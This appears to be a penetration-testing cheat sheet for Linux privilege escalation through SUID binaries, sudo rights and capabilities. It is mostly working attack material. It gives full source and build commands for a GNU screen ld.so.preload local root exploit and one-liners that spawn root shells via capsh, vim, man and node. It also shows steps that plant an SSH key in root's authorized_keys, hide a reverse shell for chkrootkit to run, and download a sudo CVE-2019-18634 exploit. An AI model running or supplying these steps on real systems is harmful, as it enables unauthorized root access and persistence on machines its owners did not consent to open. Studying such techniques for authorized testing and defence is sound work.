All of this is for unique suid, sudo or capabilities. Any common one please check GTFOBins!. You can check the references below for more good site for this :)
All of these file do it on your machine first then transfer the file to your targets.
Save the file in libhax.c. Then compile like the command below:
# Command to Compile
gcc -fPIC -shared -ldl -o libhax.so libhax.c
# Script To Save (libhax.c)
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
Save the file in rootshell.c. Then compile like the command below:
# Command to Compile
gcc -o rootshell rootshell.c
# Script To Save (rootshell.c)
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
Save the file in screenroot.sh like below:
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
After that please transfer all of the files and chmod 777 all the transfer files on your target machine. Run like below and get rooted!
./screenroot.sh
./rootshell
Link => ExploitDB-41154
- Just run the binary hping3
- Type any commands like id or you can go anywhere as a root.
- /usr/sbin/capsh --keep=1 --user=root -- -c bash -p
- /usr/sbin/capsh -- -p
# Depends on python (sometimes)
- vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
- vim.basic -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
[1] Case 1: If there is no default pager (less)
- sudo /bin/man -P /usr/bin/less man
* Then !/bin/sh
- sudo PAGER=/usr/bin/less /bin/man man
* Then !/bin/sh
[2] Case 2: If there is no less pager
- Create /tmp/cat
* Contains
mkdir /root/.ssh
echo '<YOUR AUTHORIZED_KEYS>' > /root/.ssh/authorized_keys
chmod 600 authorized_keys
- sudo /bin/man -P /tmp/cat man
- Now you can ssh root@IP -i id_rsa
- sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
Link => Local root exploit in Chkrootkit
- '/tmp/update' is executed every time when Chkrootkit is executed so check the cron for find when chkrootkit is launched .
- So make a new file name update in /tmp.
- Put a reverse shell inside update and wait for chkrootkit to execute!
Link => CVE-2019-18634
- Sudo versions 1.7.1 to 1.8.30 inclusive are affected but only if the pwfeedback option is enabled in sudoers.
- You can test using this commands
-> perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S /bin/bash
-> if got segmentation fault means you can exploit this.
- wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
- gcc exploit.c -o exploit
- Then run the exploit!
[1] https://gtfobins.github.io/
[2] https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
[3] https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/